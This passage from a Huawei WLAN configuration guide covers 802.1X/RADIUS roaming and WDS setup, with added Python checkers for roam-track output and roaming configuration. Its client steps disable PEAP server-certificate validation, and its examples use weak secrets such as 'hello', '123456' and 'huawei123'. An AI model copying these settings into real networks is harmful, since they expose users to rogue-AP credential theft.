[AC-GigabitEthernet1/0/3] port link-type trunk
[AC-GigabitEthernet1/0/3] port trunk allow-pass vlan 101 102
[AC-GigabitEthernet1/0/3] quit
[AC] interface gigabitethernet 1/0/4
[AC-GigabitEthernet1/0/4] port link-type trunk
[AC-GigabitEthernet1/0/4] port trunk pvid vlan 103
[AC-GigabitEthernet1/0/4] port trunk allow-pass vlan 103
[AC-GigabitEthernet1/0/4] quit

Step 3 Configure the AC to function as a DHCP server to assign IP addresses to the STAs and APs,
and configure VLANIF 103 to allow the AC to communicate with the RADIUS server.
# Configure the DHCP server based on the interface address pool. VLANIF100 provides IP
addresses for AP1 and AP2, VLANIF101 provides IP addresses for STAs connected to AP1,
and VLANIF102 provides IP addresses for STAs connected to AP2.
[AC] dhcp enable //Enable the DHCP function.
[AC] interface vlanif 100
[AC-Vlanif100] ip address 192.168.10.1 24
[AC-Vlanif100] dhcp select interface //Configure an interface-based address pool.
[AC-Vlanif100] quit
[AC] interface vlanif 101
[AC-Vlanif101] ip address 192.168.11.1 24
[AC-Vlanif101] dhcp select interface
[AC-Vlanif101] quit


[AC] interface vlanif 102


[AC-Vlanif102] ip address 192.168.12.1 24
[AC-Vlanif102] dhcp select interface
[AC-Vlanif102] quit

# Configure VLANIF 103.


[AC] interface vlanif 103
[AC-Vlanif103] ip address 192.168.0.1 24
[AC-Vlanif103] quit

Step 4 Configure an AAA domain to which a RADIUS server template is applied.


1. Configure a RADIUS server template, an AAA authentication scheme, and domain
information.
NOTE
Ensure that the AC and RADIUS server have the same shared key.
[AC] radius-server template radius_huawei //Create a RADIUS server template.
[AC-radius-radius_huawei] radius-server authentication 192.168.0.2 1812 //Specify the IP address and port number of the RADIUS authentication server.
[AC-radius-radius_huawei] radius-server shared-key cipher hello //Configure the shared key of the RADIUS server.
[AC-radius-radius_huawei] quit
[AC] aaa
[AC-aaa] authentication-scheme radius_huawei //Create an authentication scheme.
[AC-aaa-authen-radius_huawei] authentication-mode radius //Set the authentication mode to RADIUS.
[AC-aaa-authen-radius_huawei] quit
[AC-aaa] domain huawei.com //Create a domain.
[AC-aaa-domain-huawei.com] authentication-scheme radius_huawei //Apply the authentication scheme to the domain.
[AC-aaa-domain-huawei.com] radius-server radius_huawei //Apply the RADIUS server template to the domain.
[AC-aaa-domain-huawei.com] quit
[AC-aaa] quit

NOTE
After domain huawei.com is configured, the domain name is added to the authentication user
name.
2. Test whether a STA can be authenticated using RADIUS authentication. A user name
test@huawei.com and password 123456 have been configured on the RADIUS server.
[AC] test-aaa test@huawei.com 123456 radius-template radius_huawei
Info: Account test succeed.

Step 5 Configure AC system parameters.


# Configure the country code.
[AC] wlan ac-global country-code cn
Warning: Modify the country code may delete configuration on those AP which use
the global country code and reset them, continue?[Y/N]:y

# Configure the AC ID and carrier ID.


[AC] wlan ac-global ac id 1 carrier id other //The default AC ID is 0. Set the
AC ID to 1.

# Configure the source interface.


[AC] wlan
[AC-wlan-view] wlan ac source interface vlanif 100

Step 6 Manage APs on the AC.


# Check the AP type IDs after obtaining the MAC addresses of the APs.


[AC-wlan-view] display ap-type all


All AP types information:
------------------------------------------------------------------------------
ID Type
------------------------------------------------------------------------------
17 AP6010SN-GN
19 AP6010DN-AGN
21 AP6310SN-GN
23 AP6510DN-AGN
25 AP6610DN-AGN
27 AP7110SN-GN
28 AP7110DN-AGN
29 AP5010SN-GN
30 AP5010DN-AGN
31 AP3010DN-AGN
33 AP6510DN-AGN-US
34 AP6610DN-AGN-US
35 AP5030DN
36 AP5130DN
37 AP7030DE
38 AP2010DN
39 AP8130DN
40 AP8030DN
42 AP9330DN
43 AP4030DN
44 AP4130DN
45 AP3030DN
46 AP2030DN
------------------------------------------------------------------------------
Total number: 23

# Set the AP authentication mode to MAC address authentication (default setting). Add the
APs offline based on the AP type ID. Assume that the type of AP1 and AP2 is AP6010DN-
AGN, and their MAC addresses are 60de-4476-e360 and dcd2-fc04-b500 respectively.
[AC-wlan-view] ap id 1 type-id 19 mac 60de-4476-e360
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2 type-id 19 mac dcd2-fc04-b500
[AC-wlan-ap-2] quit

# Configure an AP region and add the APs to the AP region.


[AC-wlan-view] ap-region id 10 //Create AP region 10
[AC-wlan-ap-region-10] quit
[AC-wlan-view] ap id 1
[AC-wlan-ap-1] region-id 10 //Add AP1 to region 10
[AC-wlan-ap-1] quit
[AC-wlan-view] ap id 2
[AC-wlan-ap-2] region-id 10 //Add AP2 to region 10
[AC-wlan-ap-2] quit

# After powering on AP1 and AP2, run the display ap all command on the AC to check the
AP running status. The command output shows that the AP status is normal.
[AC-wlan-view] display ap all
All AP information:
Normal[2],Fault[0],Commit-failed[0],Committing[0],Config[0],Download[0]
Config-failed[0],Standby[0],Type-not-match[0],Ver-mismatch[0]
------------------------------------------------------------------------------
AP AP AP Profile AP AP
/Region
ID Type MAC ID State Sysname
------------------------------------------------------------------------------
1 AP6010DN-AGN 60de-4476-e360 0/10 normal ap-1
2 AP6010DN-AGN dcd2-fc04-b500 0/10 normal ap-2
------------------------------------------------------------------------------
Total number: 2,printed: 2


Step 7 Configure WLAN service parameters.


# Create a WMM profile named wmm and retain the default parameter settings.
[AC-wlan-view] wmm-profile name wmm id 1
[AC-wlan-wmm-prof-wmm] quit

# Create a radio profile named radio and bind the WMM profile wmm to the radio profile.
[AC-wlan-view] radio-profile name radio id 1
[AC-wlan-radio-prof-radio] channel-mode fixed
[AC-wlan-radio-prof-radio] wmm-profile name wmm
[AC-wlan-radio-prof-radio] quit
[AC-wlan-view] quit

# Create a WLAN-ESS interface. To implement roaming between APs in different service
VLANs, configure two service VLANs (VLAN101 and VLAN102) on each WLAN-ESS
interface.
[AC] interface wlan-ess 0
[AC-Wlan-Ess0] port trunk allow-pass vlan 101 102
[AC-Wlan-Ess0] authentication dot1x //Enable 802.1x authentication.
[AC-Wlan-Ess0] dot1x authentication-method eap //Configure EAP relay
authentication for 802.1x users.
[AC-Wlan-Ess0] domain name huawei.com force //Configure a forcible
authentication domain.
[AC-Wlan-Ess0] permit-domain name huawei.com //Configure a permitted domain for
WLAN users.
[AC-Wlan-Ess0] quit
[AC] interface wlan-ess 1
[AC-Wlan-Ess1] port trunk allow-pass vlan 101 102
[AC-Wlan-Ess1] authentication dot1x
[AC-Wlan-Ess1] dot1x authentication-method eap
[AC-Wlan-Ess1] domain name huawei.com force
[AC-Wlan-Ess1] permit-domain name huawei.com
[AC-Wlan-Ess1] quit

# Create a security profile named security and configure the security policy to
WPA2-802.1X.
[AC] wlan
[AC-wlan-view] security-profile name security id 1
[AC-wlan-sec-prof-security] security-policy wpa2
[AC-wlan-sec-prof-security] wpa2 authentication-method dot1x encryption-method ccmp //Configure WPA2 802.1x authentication and CCMP encryption.
[AC-wlan-sec-prof-security] quit

# Create a traffic profile named traffic and retain the default parameter settings.
[AC-wlan-view] traffic-profile name traffic id 1
[AC-wlan-traffic-prof-traffic] quit

# Configure service sets for AP1 and AP2, and set the data forwarding mode to tunnel forwarding.
[AC-wlan-view] service-set name huawei-1
[AC-wlan-service-set-huawei-1] ssid test
[AC-wlan-service-set-huawei-1] wlan-ess 0
[AC-wlan-service-set-huawei-1] service-vlan 101
[AC-wlan-service-set-huawei-1] security-profile name security
[AC-wlan-service-set-huawei-1] traffic-profile name traffic
[AC-wlan-service-set-huawei-1] forward-mode tunnel
[AC-wlan-service-set-huawei-1] quit
[AC-wlan-view] service-set name huawei-2
[AC-wlan-service-set-huawei-2] ssid test
[AC-wlan-service-set-huawei-2] wlan-ess 1
[AC-wlan-service-set-huawei-2] service-vlan 102
[AC-wlan-service-set-huawei-2] security-profile name security


[AC-wlan-service-set-huawei-2] traffic-profile name traffic


[AC-wlan-service-set-huawei-2] forward-mode tunnel
[AC-wlan-service-set-huawei-2] quit

# Configure a VAP.
[AC-wlan-view] ap 1 radio 0
[AC-wlan-radio-1/0] radio-profile name radio
[AC-wlan-radio-1/0] channel 20mhz 1
[AC-wlan-radio-1/0] service-set name huawei-1
[AC-wlan-radio-1/0] quit
[AC-wlan-view] ap 2 radio 0
[AC-wlan-radio-2/0] radio-profile name radio
[AC-wlan-radio-2/0] channel 20mhz 6
[AC-wlan-radio-2/0] service-set name huawei-2
[AC-wlan-radio-2/0] quit

# Commit the configuration.


[AC-wlan-view] commit ap 1
Warning: Committing configuration may cause service interruption, continue?[Y/N]
:y
[AC-wlan-view] commit ap 2
Warning: Committing configuration may cause service interruption, continue?[Y/N]
:y

Step 8 Verify the configuration.

After the configuration is complete, the STA can connect to the WLAN with the SSID test in
the coverage area of AP1. Use 802.1X authentication on the STA and enter the user name and
password. If the authentication succeeds, the STA can connect to the Internet. Configure the
STA according to the configured authentication mode PEAP.

l Configuration on the Windows XP operating system:


a. On the Association tab page of the Wireless network properties dialog box, add
SSID test, set the authentication mode to WPA2, encryption mode to CCMP, and
encryption algorithm to AES.
b. On the Authentication tab page, set EAP type to PEAP and click Properties. In
the Protected EAP Properties dialog box, deselect Validate server certificate and
click Configure. In the displayed dialog box, deselect Automatically use my
Windows logon name and password and click OK.
l Configuration on the Windows 7 operating system:
a. Access the Manage wireless networks page, click Add, and select Manually
create a network profile. Add SSID test. Set the authentication mode to WPA2-
Enterprise, the encryption mode to CCMP, and the algorithm to AES. Click Next.
b. Scan SSIDs and double-click SSID test. On the Security tab page, set EAP type to
PEAP and click Settings. In the displayed dialog box, deselect Validate server
certificate and click Configure. In the displayed dialog box, deselect
Automatically use my Windows logon name and password and click OK.

Assume that the STA MAC address is 0025-86aa-0d1c. When the STA connects to the
WLAN with the SSID test in the coverage area of AP1, run the display station assoc-info ap
1 command on the AC to check the STA access information.
<HUAWEI> display station assoc-info ap 1
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------
0025-86aa-0d1c 1 0 0 test
------------------------------------------------------------------------------
Total stations: 1


When the STA moves from the coverage of AP1 to AP2, run the display station assoc-info
ap 2 command on the AC to check the STA access information. The STA is associated with
AP2.
<HUAWEI> display station assoc-info ap 2
------------------------------------------------------------------------------
STA MAC AP ID RADIO ID SS ID SSID
------------------------------------------------------------------------------
0025-86aa-0d1c 2 0 1 test
------------------------------------------------------------------------------
Total stations: 1

Run the display station roam-track sta 0025-86aa-0d1c command on the AC to check the
STA roaming track.
<HUAWEI> display station roam-track sta 0025-86aa-0d1c
------------------------------------------------------------------------------
AP ID Radio ID BSSID TIME
------------------------------------------------------------------------------
1 0 60de-4476-e360 2012/12/23 14:40:37
2 0 dcd2-fc04-b500 2012/12/23 14:40:39
------------------------------------------------------------------------------
Number of roam track: 1
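The roaming track above is the evidence that the STA actually moved from AP1 to AP2 and how long the switchover took. The following script is an added example, not Huawei code and not part of this document: it parses `display station roam-track` output, computes the delay between consecutive associations, and flags two things a WLAN operator wants to see in a verification step, a roam that took longer than an assumed threshold (5 s here) and a BSSID that does not belong to the AP the AC says it belongs to. The second constructed sample and the AP ID to MAC mapping are assumptions built from the AP entries in this example; the page's output shows the radio 0 BSSID equal to the AP MAC, which is what the check relies on.

```python
import re
from datetime import datetime

# Constructed sample, modelled on the `display station roam-track` output shown above.
ROAM_TRACK = """\
<HUAWEI> display station roam-track sta 0025-86aa-0d1c
------------------------------------------------------------------------------
AP ID  Radio ID  BSSID           TIME
------------------------------------------------------------------------------
1      0         60de-4476-e360  2012/12/23 14:40:37
2      0         dcd2-fc04-b500  2012/12/23 14:40:39
------------------------------------------------------------------------------
Number of roam track: 1
"""

# Constructed: a slow roam plus an entry whose BSSID is not the MAC of the AP it names.
ROAM_TRACK_SUSPECT = """\
AP ID  Radio ID  BSSID           TIME
1      0         60de-4476-e360  2012/12/23 14:40:37
2      0         dcd2-fc04-b500  2012/12/23 14:40:49
1      0         0011-2233-4455  2012/12/23 14:40:50
Number of roam track: 2
"""

# AP ID -> AP MAC, taken from the `ap id ... mac ...` entries of this example. The
# roam-track output above reports the radio 0 BSSID equal to the AP MAC (assumption).
MANAGED_APS = {1: "60de-4476-e360", 2: "dcd2-fc04-b500"}

ROW_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+([0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4})\s+"
                    r"(\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2})\s*$")
COUNT_RE = re.compile(r"^Number of roam track:\s*(\d+)")


def parse_roam_track(text):
    """Return (entries, reported_count) from the roam-track table."""
    entries, reported = [], None
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            entries.append({"ap_id": int(m.group(1)), "radio_id": int(m.group(2)),
                            "bssid": m.group(3),
                            "time": datetime.strptime(m.group(4), "%Y/%m/%d %H:%M:%S")})
            continue
        m = COUNT_RE.match(line)
        if m:
            reported = int(m.group(1))
    return entries, reported


def analyse_roam_track(text, managed_aps, max_delay_s=5.0):
    """Compute per-roam delay and flag slow roams, unknown APs and BSSID mismatches."""
    entries, reported = parse_roam_track(text)
    hops, findings = [], []
    for prev, cur in zip(entries, entries[1:]):
        delay = (cur["time"] - prev["time"]).total_seconds()
        hops.append({"from_ap": prev["ap_id"], "to_ap": cur["ap_id"], "delay_s": delay})
        if delay > max_delay_s:
            findings.append(f"roam AP{prev['ap_id']}->AP{cur['ap_id']} took {delay:.0f} s "
                            f"(limit {max_delay_s:.0f} s)")
    for e in entries:
        expected = managed_aps.get(e["ap_id"])
        if expected is None:
            findings.append(f"AP{e['ap_id']} is not a managed AP")
        elif expected != e["bssid"]:
            findings.append(f"AP{e['ap_id']}: BSSID {e['bssid']} does not match AP MAC {expected}")
    # The AC's own counter should equal the number of transitions in the table.
    if reported is not None and reported != len(hops):
        findings.append(f"AC reports {reported} roams but the track lists {len(hops)}")
    return {"hops": hops, "reported_roams": reported, "findings": findings}


if __name__ == "__main__":
    for label, sample in (("example", ROAM_TRACK), ("suspect", ROAM_TRACK_SUSPECT)):
        result = analyse_roam_track(sample, MANAGED_APS)
        print(label, result["hops"], result["findings"] or "OK")
```

The timestamps in the output have one-second resolution, so the computed delay is only a coarse upper bound on the switchover time; it is still enough to tell a key-negotiation-only fast roam from one that went through full 802.1X authentication again.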

----End

Configuration Files
l Configuration file of SwitchA
#
sysname SwitchA
#
vlan batch 100
#
interface GigabitEthernet0/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet0/0/3
port link-type trunk
port trunk allow-pass vlan 100
#
return

l Configuration file of the AC


#
sysname AC
#
vlan batch 100 to 103
#
wlan ac-global carrier id other ac id 1
#
dhcp enable
#
radius-server template radius_huawei
radius-server shared-key cipher %#%#`z0u2h-7qBdp(x:|E]|#62(s!J~(}*DNPx<+Bbr!%#%
radius-server authentication 192.168.0.2 1812 weight 80
#
aaa
authentication-scheme radius_huawei
authentication-mode radius
domain huawei.com


authentication-scheme radius_huawei
radius-server radius_huawei
#
interface Vlanif100
ip address 192.168.10.1 255.255.255.0
dhcp select interface
#
interface Vlanif101
ip address 192.168.11.1 255.255.255.0
dhcp select interface
#
interface Vlanif102
ip address 192.168.12.1 255.255.255.0
dhcp select interface
#
interface Vlanif103
ip address 192.168.0.1 255.255.255.0
#
interface GigabitEthernet1/0/1
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/2
port link-type trunk
port trunk pvid vlan 100
port trunk allow-pass vlan 100
#
interface GigabitEthernet1/0/3
port link-type trunk
port trunk allow-pass vlan 101 to 102
#
interface GigabitEthernet1/0/4
port link-type trunk
port trunk allow-pass vlan 103
#
interface Wlan-Ess0
port trunk allow-pass vlan 101 to 102
authentication dot1x
dot1x authentication-method eap
permit-domain name huawei.com
domain name huawei.com force
#
interface Wlan-Ess1
port trunk allow-pass vlan 101 to 102
authentication dot1x
dot1x authentication-method eap
permit-domain name huawei.com
domain name huawei.com force
#
wlan
wlan ac source interface vlanif100
ap-region id 10
ap id 1 type-id 19 mac 60de-4476-e360 sn 190901007618
region-id 10
ap id 2 type-id 19 mac dcd2-fc04-b500 sn 190901007619
region-id 10
wmm-profile name wmm id 1
traffic-profile name traffic id 1
security-profile name security id 1
security-policy wpa2
service-set name huawei-1 id 0
forward-mode tunnel
wlan-ess 0
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 101


service-set name huawei-2 id 1


forward-mode tunnel
wlan-ess 1
ssid test
traffic-profile id 1
security-profile id 1
service-vlan 102
radio-profile name radio id 1
channel-mode fixed
wmm-profile id 1
ap 1 radio 0
radio-profile id 1
service-set id 0 wlan 1
ap 2 radio 0
radio-profile id 1
channel 20MHz 6
service-set id 1 wlan 2
#
return
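The Configuration Notes require that APs a STA roams between use the same SSID and security profile with identical settings, and Step 7 requires each WLAN-ESS interface to carry both service VLANs. Those are easy to get wrong on a second AC or after a later edit, and the symptom (a dropped session on roam) looks like a radio problem. The script below is an added example, not Huawei code and not part of this document: it parses the WLAN-ESS and wlan sections of a configuration file like the one above and checks every group of service sets that share an SSID against those prerequisites. The sample configuration is a constructed excerpt of the AC file above with the nesting indentation a running configuration normally shows; the checker ignores indentation and uses `#` as the section terminator, which is an assumption about the file layout.

```python
import re
from collections import defaultdict

# Constructed sample: the WLAN-ESS and wlan sections of the AC configuration file above.
AC_CONFIG = """\
#
interface Wlan-Ess0
 port trunk allow-pass vlan 101 to 102
 authentication dot1x
 dot1x authentication-method eap
 permit-domain name huawei.com
 domain name huawei.com force
#
interface Wlan-Ess1
 port trunk allow-pass vlan 101 to 102
 authentication dot1x
 dot1x authentication-method eap
 permit-domain name huawei.com
 domain name huawei.com force
#
wlan
 wlan ac source interface vlanif100
 security-profile name security id 1
  security-policy wpa2
 service-set name huawei-1 id 0
  forward-mode tunnel
  wlan-ess 0
  ssid test
  security-profile id 1
  service-vlan 101
 service-set name huawei-2 id 1
  forward-mode tunnel
  wlan-ess 1
  ssid test
  security-profile id 1
  service-vlan 102
#
return
"""

# Constructed variant: Wlan-Ess1 no longer carries service VLAN 101.
BAD_CONFIG = AC_CONFIG.replace(
    "interface Wlan-Ess1\n port trunk allow-pass vlan 101 to 102",
    "interface Wlan-Ess1\n port trunk allow-pass vlan 102")

BLOCK_RE = re.compile(r"^(service-set|security-profile|traffic-profile|radio-profile"
                      r"|wmm-profile) name (\S+) id (\d+)$")
IFACE_RE = re.compile(r"^interface (Wlan-Ess\d+)$", re.IGNORECASE)
VLAN_RE = re.compile(r"^port trunk allow-pass vlan (.+)$")


def expand_vlans(spec):
    """'101 to 102' -> {101, 102}; '101 102' -> {101, 102}."""
    tokens, vlans, i = spec.split(), set(), 0
    while i < len(tokens):
        if i + 2 < len(tokens) and tokens[i + 1] == "to":
            vlans.update(range(int(tokens[i]), int(tokens[i + 2]) + 1))
            i += 3
        else:
            vlans.add(int(tokens[i]))
            i += 1
    return vlans


def parse_ac_config(text):
    """Return (wlan_ess, blocks): allowed VLANs and lines per WLAN-ESS, and wlan profile blocks."""
    wlan_ess, blocks, current = {}, defaultdict(dict), None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line in ("return", "wlan"):
            continue
        if line == "#":                       # section terminator
            current = None
            continue
        m = IFACE_RE.match(line)
        if m:
            current = {"vlans": set(), "lines": []}
            wlan_ess[m.group(1)] = current
            continue
        m = BLOCK_RE.match(line)
        if m:
            kind, name, bid = m.groups()
            current = {"id": int(bid), "lines": []}
            blocks[kind][name] = current
            continue
        if line.startswith(("ap ", "ap-region", "wlan ac ")):
            current = {"lines": []}           # AP entries are not checked here
            continue
        if current is None:
            continue                          # top-level lines outside the sections of interest
        m = VLAN_RE.match(line)
        if m and "vlans" in current:
            current["vlans"] |= expand_vlans(m.group(1))
        else:
            current["lines"].append(line)
    return wlan_ess, blocks


def check_roaming(wlan_ess, blocks):
    """Apply the roaming prerequisites to every group of service sets sharing an SSID."""
    findings = []
    profiles_by_id = {p["id"]: tuple(p["lines"]) for p in blocks["security-profile"].values()}
    groups = defaultdict(list)
    for name, ss in blocks["service-set"].items():
        attrs = dict(l.split(" ", 1) for l in ss["lines"] if " " in l)
        groups[attrs.get("ssid")].append((name, attrs))
    for ssid, members in groups.items():
        if len(members) < 2:
            continue                          # nothing to roam between
        # 1. Same security profile, or at least profiles with identical settings.
        sec_ids = {int(a["security-profile"].split()[-1]) for _, a in members if "security-profile" in a}
        configs = {profiles_by_id.get(i) for i in sec_ids}
        if len(configs) != 1 or None in configs:
            findings.append(f"SSID {ssid}: service sets use security profiles with different settings {sorted(sec_ids)}")
        # 2. Every WLAN-ESS interface in the group must carry every service VLAN of the group.
        vlans = {int(a["service-vlan"]) for _, a in members if "service-vlan" in a}
        ess_settings = set()
        for name, a in members:
            iface = f"Wlan-Ess{a.get('wlan-ess')}"
            if iface not in wlan_ess:
                findings.append(f"{name}: {iface} is not configured")
                continue
            missing = vlans - wlan_ess[iface]["vlans"]
            if missing:
                findings.append(f"{name}: {iface} does not allow service VLAN(s) {sorted(missing)}")
            ess_settings.add(tuple(sorted(wlan_ess[iface]["lines"])))
        # 3. 802.1X and domain settings must match across the group's WLAN-ESS interfaces.
        if len(ess_settings) > 1:
            findings.append(f"SSID {ssid}: 802.1X/domain settings differ across WLAN-ESS interfaces")
    return findings


if __name__ == "__main__":
    for label, cfg in (("example config", AC_CONFIG), ("broken config", BAD_CONFIG)):
        print(label, check_roaming(*parse_ac_config(cfg)) or "OK")
```

Run it against the saved configuration of each AC before a roaming test; the same three checks apply to the psk-based example earlier in this chapter, where the security profile lines compared are the `security-policy` and `wpa2 authentication-method` lines instead.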

15.10 Example for Configuring the WLAN Service Using WDS Technology
WDS Overview
A wireless distribution system (WDS) connects two or more wired or wireless LANs using
wireless links to establish a large network.

On a traditional WLAN network, APs connect to an AC through wired uplinks. However,
wired connections are difficult or costly to implement in some areas such as tunnels and
docks. WDS technology can be used in these areas to connect APs to an AC using wireless
links. This technology facilitates WLAN deployment in complex geographical environments,
reduces network deployment cost, allows flexible networking, and makes the network easy to
expand.

APs on a WDS network work in any of the following modes:
l Root: A root AP connects to an AC using a wired link and connects to a middle or leaf
AP using an uplink wireless link.
l Middle: A middle AP is an intermediate node between an upstream root AP and a
downstream leaf AP. It connects to the root and leaf APs using wireless links.
l Leaf: A leaf AP connects to a root or middle AP using an uplink wireless link.

Both WDS and Mesh technologies can implement wireless bridging between APs. A WDS
network supports a maximum of three hops (for example, a WDS link established along a root
node, a middle node, and a leaf node is a three-hop link), whereas a Mesh network supports a
maximum of eight hops. A WDS network has a tree topology and does not support link
redundancy between nodes. A Mesh network has a Mesh topology and supports link
redundancy between nodes. Therefore, a Mesh network is more reliable than a WDS network.
You can choose WDS or Mesh technology to deploy wireless bridging between APs
according to your needs.

Configuration Notes
l The AP2030DN, AP7030DE, AP9330DN, AP6310SN-GN and AP2010DN do not
support the WDS function.

l On a WDS or Mesh network, an 802.11ac AP cannot interoperate with non-802.11ac APs regardless of the radio types used by the AP. Only 802.11ac APs can interoperate with each other.
NOTE
Among all WDS- or Mesh-capable APs, the AP4030DN, AP4130DN, AP5030DN, AP8030DN,
AP8130DN, and AP5130DN are 802.11ac APs.
l If radio 0 of the AP8130DN is configured to work on the 5 GHz frequency band and
used for WDS or Mesh services, the software version of the AP connected to the
AP8130DN must be V200R005C10 or later.
l When planning a WDS network, pay attention to the following:
– The back-to-back WDS networking involves two WDS networks. A single WDS
network cannot form a back-to-back WDS network.
– Only one root node exists on the WDS network.
– A middle node sets up WDS links only with the leaf node and root node. Middle
nodes do not set up WDS links between each other.
– Each WDS link allows a maximum of three hops (a 3-hop WDS link includes a root
node, a middle node, and a leaf node).
– Each node on the WDS link supports a maximum of six subnodes.
l WDS and Mesh technologies cannot be used on the same network.
l If WDS and Mesh services are configured on an AP radio, WIDS, spectrum analysis, or
WLAN location on the radio does not take effect.
l How to configure the source interface:
– In V200R005 and V200R006, run the wlan ac source interface { loopback
loopback-number | vlanif vlan-id } command in the WLAN view.
– In V200R007 and V200R008, run the capwap source interface { loopback
loopback-number | vlanif vlan-id } command in the system view.
l The following table lists applicable products and versions.

Table 15-31 Applicable products and versions

Software Version | Product Model | AP Model and Version
V200R005C00 | S12700 | V200R005C00: AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R006C00 | S12700 | V200R005C00: AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN
V200R007C00 | S12700 | V200R005C10: AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN
V200R008C00 | S12700 | V200R005C10: AP3010DN-AGN, AP5010DN-AGN, AP5010SN-GN, AP5030DN, AP5130DN, AP6010SN-GN, AP6010DN-AGN, AP6510DN-AGN, AP6610DN-AGN, AP7110DN-AGN, AP7110SN-GN, AP8030DN, AP8130DN; V200R005C30: AP4030DN, AP4130DN

Networking Requirements
An enterprise has three office locations: Area A, Area B, and Area C. AP1 in Area A can
connect to SwitchA through cables, but AP2 in Area B and AP3 in Area C cannot. The
enterprise needs to provide Internet access for WLAN users in the three areas and wired users
in Area C, as shown in Figure 15-14.

Figure 15-14 WLAN WDS networking

[Figure not reproduced in text. Labels recovered from the diagram: IP backbone network; AC (GE1/0/0); SwitchA (GE0/0/2, GE0/0/1); AP1 (root) in Area A; AP2 (middle) in Area B; AP3 (leaf) in Area C; STAs in each area; L2 network and Switch for the wired users in Area C; legend: wireless virtual link.]

Data Planning
Before configuring the WDS service, determine the types and MAC addresses of the APs
used as WDS bridges. The following table provides the data plan for this example.


NOTE
The APs used in this example are AP6010DN-AGN.

Table 15-32 AP data required for completing the configuration


AP Type MAC

AP1 AP6010DN-AGN 0046-4b59-1ee0

AP2 AP6010DN-AGN 0046-4b59-1d20

AP3 AP6010DN-AGN 0046-4b59-1d40

The following provides data planning for WDS service configuration.

Table 15-33 Service data required for completing the configuration

Item | Data | Description
VLAN | Management VLAN: 100 | None
VLAN | Service VLANs: 101, 102, 103, 104, 105, 106. Area A: VLAN 101 for WLAN services; Area B: VLAN 102 for WLAN services; Area C: VLAN 103 for WLAN services; Area C: VLANs 104, 105, and 106 on AP3 wired interfaces | The WDS bridges must allow packets of the service VLANs to which Area A, Area B, and Area C belong.
Service forwarding mode on APs | Direct forwarding mode | None
IP address of the AC's source interface | VLANIF 100: 192.168.10.1/24 | None
AP region | AP1: 101, AP2: 102, AP3: 103 | None
WMM profile | Name: wp01 | None
Radio profile | Name: rp01 and rp02 | Use radio profile rp02 for the WDS service and radio profile rp01 for the basic WLAN service.
Security profile | Name: sp01; Security and authentication policy: WPA2+PSK; Authentication key: huawei123; Encryption mode: CCMP | WDS bridges support only the security policy using WPA2+PSK authentication and CCMP encryption. In this example, the security profile sp01 is also used for the basic WLAN service. Select an appropriate security policy for the WLAN service in real-world applications.
Traffic profile | Name: tp01 | None
Bridge profile | Name: bp01; Bridge identifier: ChinaNet01 | All APs on a WDS network must have the same bridge ID.
Service set | Name: ss01; SSID: ChinaSer01; WLAN virtual interface: WLAN-ESS 1; Service data forwarding mode: direct forwarding | None
Service set | Name: ss02; SSID: ChinaSer02; WLAN virtual interface: WLAN-ESS 2; Service data forwarding mode: direct forwarding | None
Service set | Name: ss03; SSID: ChinaSer03; WLAN virtual interface: WLAN-ESS 3; Service data forwarding mode: direct forwarding | None
Bridge whitelist | Name: bw01 and bw02 | A WDS whitelist profile contains the MAC addresses of neighboring APs allowed to set up WDS links with an AP. After a WDS whitelist profile is applied to an AP radio, only APs with MAC addresses in the whitelist can access the AP; other APs are denied. In a WDS network, only APs with radios working in root mode and middle mode can have a whitelist configured. APs in leaf mode require no whitelist.

Configuration Roadmap
The configuration roadmap is as follows:
1. Configure the AC and SwitchA to implement Layer 2 connectivity between the AC,
SwitchA, and AP1.
2. Configure the WDS function to allow AP2 and AP3 to connect to the AC using wireless
links.
3. Configure the basic WLAN service to provide Internet access service for WLAN users in
Area A, Area B, and Area C.

Procedure
Step 1 Connect AC and AP1.
# Configure the access switch SwitchA. Add GE0/0/1 on SwitchA to VLAN 100 (the management VLAN) and set the PVID of GE0/0/1 to VLAN 100. Configure GE0/0/1 and GE0/0/2 to allow packets from VLANs 100 to 106 to pass through.

NOTE

Configure port isolation on GE0/0/1, which connects SwitchA to the AP. Otherwise, unnecessary packets are broadcast in the VLAN, or WLAN users of different APs can communicate with each other at Layer 2.
<HUAWEI> system-view
[HUAWEI] sysname SwitchA
[SwitchA] vlan batch 100 to 106
[SwitchA] interface gigabitEthernet 0/0/1
[SwitchA-GigabitEthernet0/0/1] port link-type trunk
[SwitchA-GigabitEthernet0/0/1] port trunk pvid vlan 100
[SwitchA-GigabitEthernet0/0/1] port trunk allow-pass vlan 100 to 106
[SwitchA-GigabitEthernet0/0/1] port-isolate enable // If the port isolation group is not specified, the interface is added to port isolation group 1 by default.
[SwitchA-GigabitEthernet0/0/1] quit
[SwitchA] interface gigabitEthernet 0/0/2
[SwitchA-GigabitEthernet0/0/2] port link-type trunk


[SwitchA-GigabitEthernet0/0/2] port trunk allow-pass vlan 100 to 106
[SwitchA-GigabitEthernet0/0/2] quit

# Set the NAC mode to unified mode on the AC (default setting). Configure GE1/0/0 to allow
packets from VLANs 100 to 106 to pass through.
[HUAWEI] sysname AC
[AC] vlan batch 100 to 106
